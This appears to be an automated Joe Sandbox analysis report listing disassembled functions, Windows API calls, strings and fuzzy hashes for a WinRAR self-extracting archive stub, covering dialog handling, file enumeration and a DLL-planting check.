                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                            • String ID: PNG
                                                            • API String ID: 541704414-364855578
                                                            • Opcode ID: e41072376dde13e5646db3676ad499a1498e62668adee5ae74abcf57c2e265b3
                                                            • Instruction ID: ddc0ad200c4afbc42859abd75f51dfbe80bb9510771aaa865e10658e2d79ff96
                                                            • Opcode Fuzzy Hash: e41072376dde13e5646db3676ad499a1498e62668adee5ae74abcf57c2e265b3
                                                            • Instruction Fuzzy Hash: 88318171604706AFE7119F21EC88D2B7BACFF887527054528FD09D2261EB39E894CB60
                                                            Function 0004BA74 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 868 4ba74-4ba98 call 5fe20 871 4bb00-4bb09 FindNextFileW 868->871 872 4ba9a-4baa7 FindFirstFileW 868->872 874 4bb1b-4bbd8 call 51908 call 4d6fd call 528f4 * 3 871->874 875 4bb0b-4bb19 GetLastError 871->875 873 4baa9-4babb call 4cf12 872->873 872->874 883 4bad7-4bae0 GetLastError 873->883 884 4babd-4bad5 FindFirstFileW 873->884 880 4bbdd-4bbea 874->880 877 4baf2-4bafb 875->877 877->880 886 4baf0 883->886 887 4bae2-4bae5 883->887 884->874 884->883 886->877 887->886 889 4bae7-4baea 887->889 889->886 891 4baec-4baee 889->891 891->877
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BA9D
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BACB
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BAD7
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BB01
                                                            • GetLastError.KERNEL32(?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BB0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: 72c754d398826fd2467236491f1ef1ec75e82bbb9fcb61c7e896f2e9e7648d50
                                                            • Instruction ID: 3b87dd24720077fecf7c74a8d21e3bb67df216db40c321ec9e0d9ded20420744
                                                            • Opcode Fuzzy Hash: 72c754d398826fd2467236491f1ef1ec75e82bbb9fcb61c7e896f2e9e7648d50
                                                            • Instruction Fuzzy Hash: 11415372901559ABCB25DF68CC84AEAB3B8FB48350F1401A6F95EE3201D774AE94CF94
                                                            Function 000492A6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000492AB
                                                              • Part of subcall function 0004D636: _wcsrchr.LIBVCRUNTIME ref: 0004D640
                                                              • Part of subcall function 0004CA80: _wcslen.LIBCMT ref: 0004CA86
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 0004B5B6: _wcslen.LIBCMT ref: 0004B5C2
                                                              • Part of subcall function 0004B5B6: __aulldiv.LIBCMT ref: 0004B5EE
                                                              • Part of subcall function 0004B5B6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B5F5
                                                              • Part of subcall function 0004B5B6: _swprintf.LIBCMT ref: 0004B620
                                                              • Part of subcall function 0004B5B6: _wcslen.LIBCMT ref: 0004B62A
                                                              • Part of subcall function 0004B5B6: _swprintf.LIBCMT ref: 0004B680
                                                              • Part of subcall function 0004B5B6: _wcslen.LIBCMT ref: 0004B68A
                                                              • Part of subcall function 00044710: __EH_prolog.LIBCMT ref: 00044715
                                                              • Part of subcall function 0004A1F0: __EH_prolog.LIBCMT ref: 0004A1F5
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Strings
                                                            • __tmp_reference_source_, xrefs: 00049576
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                            • String ID: __tmp_reference_source_
                                                            • API String ID: 70197177-685763994
                                                            • Opcode ID: 3a7fd830907db1d39c46073094c90783825bbbc9a156d8b84203d57761c4b5ec
                                                            • Instruction ID: 470e1537897947d9e49a86fc36cc1817309c05740b16cb882feebac45fde2068
                                                            • Opcode Fuzzy Hash: 3a7fd830907db1d39c46073094c90783825bbbc9a156d8b84203d57761c4b5ec
                                                            • Instruction Fuzzy Hash: DEA217B1A04245AEDF65DF64C895BEF7BF5BF05300F0841B9E8499B183DB309988CB69
                                                            Function 00069000 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002,00000000), ref: 00069021
                                                            • TerminateProcess.KERNEL32(00000000,?,00068FD6,?,0007D570,0000000C,0006912D,?,00000002,00000000), ref: 00069028
                                                            • ExitProcess.KERNEL32 ref: 0006903A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: a5f16e8ed4926b1ce36e179eab007df4375a190d73e422e0de389c9a2e6c66d7
                                                            • Instruction ID: 7c87ac6dcbc88a0dd3ef80fe6d4de112963a5512cb0a9ecb1ea2d24281c0be04
                                                            • Opcode Fuzzy Hash: a5f16e8ed4926b1ce36e179eab007df4375a190d73e422e0de389c9a2e6c66d7
                                                            • Instruction Fuzzy Hash: D5E0BF35454108AFEF116F64DD0DA983B6AEB54341B014414F90996532CB79DD82CA90
                                                            Function 00057DAC Relevance: .3, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: b2fa7e37d3a8962f6c73a118415009710bd537408883ea86731122bb72d4560a
                                                            • Instruction ID: 123bc2afd9a2d332a179b076180f0f7eefb953714cfbf4de15be113b5533f1df
                                                            • Opcode Fuzzy Hash: b2fa7e37d3a8962f6c73a118415009710bd537408883ea86731122bb72d4560a
                                                            • Instruction Fuzzy Hash: F6D1A1B16487408FDB24CF28C84479BBBE5BF89309F04456DEC89AB242D734ED59CB5A
                                                            Function 0005C870 Relevance: 100.5, APIs: 48, Strings: 9, Instructions: 729windowfilesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005C875
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005C961
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C97F
                                                            • IsDialogMessageW.USER32(?,?), ref: 0005C992
                                                            • TranslateMessage.USER32(?), ref: 0005C9A0
                                                            • DispatchMessageW.USER32(?), ref: 0005C9AA
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0005C9CD
                                                            • EndDialog.USER32(?,00000001), ref: 0005C9F0
                                                            • GetDlgItem.USER32(?,00000068), ref: 0005CA13
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005CA2E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005CA41
                                                              • Part of subcall function 0005E415: _wcslen.LIBCMT ref: 0005E43F
                                                            • SetFocus.USER32(00000000), ref: 0005CA48
                                                            • _swprintf.LIBCMT ref: 0005CAB4
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                              • Part of subcall function 0005E496: GetDlgItem.USER32(00000068,000A1CF0), ref: 0005E4AA
                                                              • Part of subcall function 0005E496: ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0005C849,000760F0,000A1CF0,000A1CF0,00001000,000830C4,00000000,?), ref: 0005E4D2
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005E4DD
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005E4EB
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E501
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005E51B
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E55F
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005E56D
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E57C
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E5A3
                                                              • Part of subcall function 0005E496: SendMessageW.USER32(00000000,000000C2,00000000,0007549C), ref: 0005E5B2
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0005CAF8
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0005CB20
                                                            • GetTickCount.KERNEL32 ref: 0005CB3E
                                                            • _swprintf.LIBCMT ref: 0005CB52
                                                            • GetLastError.KERNEL32(?,00000011), ref: 0005CB84
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0005CBD3
                                                            • _swprintf.LIBCMT ref: 0005CC0A
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0005CC5E
                                                            • GetCommandLineW.KERNEL32 ref: 0005CC74
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00091482,00000400,00000001,00000001), ref: 0005CCCB
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0005CCF3
                                                            • Sleep.KERNEL32(00000064), ref: 0005CD3B
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000421C,00091482,00000400), ref: 0005CD64
                                                            • CloseHandle.KERNEL32(00000000), ref: 0005CD6D
                                                            • _swprintf.LIBCMT ref: 0005CDA0
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CDFF
                                                            • SetDlgItemTextW.USER32(?,00000065,000745F4), ref: 0005CE16
                                                            • GetDlgItem.USER32(?,00000065), ref: 0005CE1F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0005CE2E
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0005CE3D
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005CEEA
                                                            • _wcslen.LIBCMT ref: 0005CF40
                                                            • _swprintf.LIBCMT ref: 0005CF6A
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005CFB4
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0005CFCE
                                                            • GetDlgItem.USER32(?,00000068), ref: 0005CFD7
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0005CFED
                                                            • GetDlgItem.USER32(?,00000066), ref: 0005D007
                                                            • SetWindowTextW.USER32(00000000,0009389A), ref: 0005D029
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0005D089
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D09C
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C650,00000000,?), ref: 0005D13F
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0005D219
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0005D25B
                                                              • Part of subcall function 0005D701: __EH_prolog.LIBCMT ref: 0005D706
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005D27F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 581453772-1645151803
                                                            • Opcode ID: 551cac51d12648fb5e8667f98bbf21e7d4ac0b08a581979bd2a619130b7d3b21
                                                            • Instruction ID: 9f2c13a5c0b04c00c8e09daedc9f19cc34025919a371b64c8976f3d7a8416cc3
                                                            • Opcode Fuzzy Hash: 551cac51d12648fb5e8667f98bbf21e7d4ac0b08a581979bd2a619130b7d3b21
                                                            • Instruction Fuzzy Hash: A842C771944744BEFB219B609D4AFFF76BCAB12706F004066FA45A60D3CB784E48CB66
                                                            Function 00051B5C Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 51b5c-51b7f call 5fe20 GetModuleHandleW 271 51b81-51b98 GetProcAddress 268->271 272 51be0-51e41 268->272 275 51bb2-51bc2 GetProcAddress 271->275 276 51b9a-51bb0 271->276 273 51e47-51e52 call 6883e 272->273 274 51f0d-51f39 GetModuleFileNameW call 4d687 call 51908 272->274 273->274 285 51e58-51e86 GetModuleFileNameW CreateFileW 273->285 291 51f3b-51f47 call 4c5f9 274->291 279 51bc4-51bd9 275->279 280 51bde 275->280 276->275 279->280 280->272 288 51f01-51f08 CloseHandle 285->288 289 51e88-51e94 SetFilePointer 285->289 288->274 289->288 292 51e96-51eb2 ReadFile 289->292 297 51f76-51f9d call 4d6fd GetFileAttributesW 291->297 298 51f49-51f54 call 51b14 291->298 292->288 294 51eb4-51ed9 292->294 296 51ef6-51eff call 51677 294->296 296->288 304 51edb-51ef5 call 51b14 296->304 306 51fa7 297->306 307 51f9f-51fa3 297->307 298->297 309 51f56-51f74 CompareStringW 298->309 304->296 311 51fa9-51fae 306->311 307->291 310 51fa5 307->310 309->297 309->307 310->311 313 51fe5-51fe7 311->313 314 51fb0 311->314 316 520f4-520fe 313->316 317 51fed-52004 call 4d6d1 call 4c5f9 313->317 315 51fb2-51fd9 call 4d6fd GetFileAttributesW 314->315 323 51fe3 315->323 324 51fdb-51fdf 315->324 327 52006-52067 call 51b14 * 2 call 4f917 call 44a00 call 4f917 call 5b7c4 317->327 328 5206c-5209f call 44a00 AllocConsole 317->328 323->313 324->315 326 51fe1 324->326 326->313 334 520ec-520ee ExitProcess 327->334 333 520a1-520e6 GetCurrentProcessId AttachConsole call 64df3 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00051B75
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051B87
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BB8
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051E62
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00051E7C
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00051E8C
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00074D24,00000000), ref: 00051EAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 00051F02
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00051F17
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00074D24,?,00000000,?,00000800), ref: 00051F6B
                                                            • GetFileAttributesW.KERNELBASE(?,?,00074D24,00000800,?,00000000,?,00000800), ref: 00051F95
                                                            • GetFileAttributesW.KERNEL32(?,?,00074DEC,00000800), ref: 00051FD1
                                                              • Part of subcall function 00051B14: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                              • Part of subcall function 00051B14: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            • _swprintf.LIBCMT ref: 00052043
                                                            • _swprintf.LIBCMT ref: 0005208F
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • AllocConsole.KERNEL32 ref: 00052097
                                                            • GetCurrentProcessId.KERNEL32 ref: 000520A1
                                                            • AttachConsole.KERNEL32(00000000), ref: 000520A8
                                                            • _wcslen.LIBCMT ref: 000520BD
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000520CE
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 000520D5
                                                            • Sleep.KERNEL32(00002710), ref: 000520E0
                                                            • FreeConsole.KERNEL32 ref: 000520E6
                                                            • ExitProcess.KERNEL32 ref: 000520EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: 7272bcc7c547bb6431d291c06def6d014e95d4ed81a52424cce13682a96f0d2a
                                                            • Instruction ID: e75649fa4e85240699c14781c1f475314a4c1f9e559fc667e38eb107aaf0d6fb
                                                            • Opcode Fuzzy Hash: 7272bcc7c547bb6431d291c06def6d014e95d4ed81a52424cce13682a96f0d2a
                                                            • Instruction Fuzzy Hash: 80D171B18087849BE3319F50DC48BDFB6E8FB85305F41892DF68D96151CBBC8948CB9A
                                                            Function 0004ED67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0004ED70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0004EDAC
                                                              • Part of subcall function 0004D687: _wcslen.LIBCMT ref: 0004D68F
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 00052EA2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CEF8,00000000,?,?), ref: 00052EBE
                                                            • _wcslen.LIBCMT ref: 0004F0E9
                                                            • __fprintf_l.LIBCMT ref: 0004F21C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: fc407d988ab44902357036bde68efa46512797cb2d477c75d6d788bc5151787d
                                                            • Instruction ID: 87f9f200b31285b02607fdd873400c9fe2a18a3c8b6c8f284fa8f168cb4cc68a
                                                            • Opcode Fuzzy Hash: fc407d988ab44902357036bde68efa46512797cb2d477c75d6d788bc5151787d
                                                            • Instruction Fuzzy Hash: C232E1B190021AEBDF24EF68C845AFE77A5FF44704F40417AFA0997292EB719D84CB58
                                                            Function 0005E496 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 652 5e496-5e4c2 call 5c5f8 GetDlgItem 655 5e4c4-5e4f1 call 5a215 ShowWindow SendMessageW * 2 652->655 656 5e4f8-5e532 SendMessageW * 2 652->656 655->656 658 5e534-5e54f 656->658 659 5e553-5e584 SendMessageW * 3 656->659 658->659 661 5e586-5e5a3 SendMessageW 659->661 662 5e5a9-5e5bf SendMessageW 659->662 661->662
                                                            APIs
                                                              • Part of subcall function 0005C5F8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                              • Part of subcall function 0005C5F8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                              • Part of subcall function 0005C5F8: IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                              • Part of subcall function 0005C5F8: TranslateMessage.USER32(?), ref: 0005C63C
                                                              • Part of subcall function 0005C5F8: DispatchMessageW.USER32(?), ref: 0005C646
                                                            • GetDlgItem.USER32(00000068,000A1CF0), ref: 0005E4AA
                                                            • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0005C849,000760F0,000A1CF0,000A1CF0,00001000,000830C4,00000000,?), ref: 0005E4D2
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005E4DD
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,000745F4), ref: 0005E4EB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E501
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005E51B
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E55F
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005E56D
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005E57C
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005E5A3
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,0007549C), ref: 0005E5B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
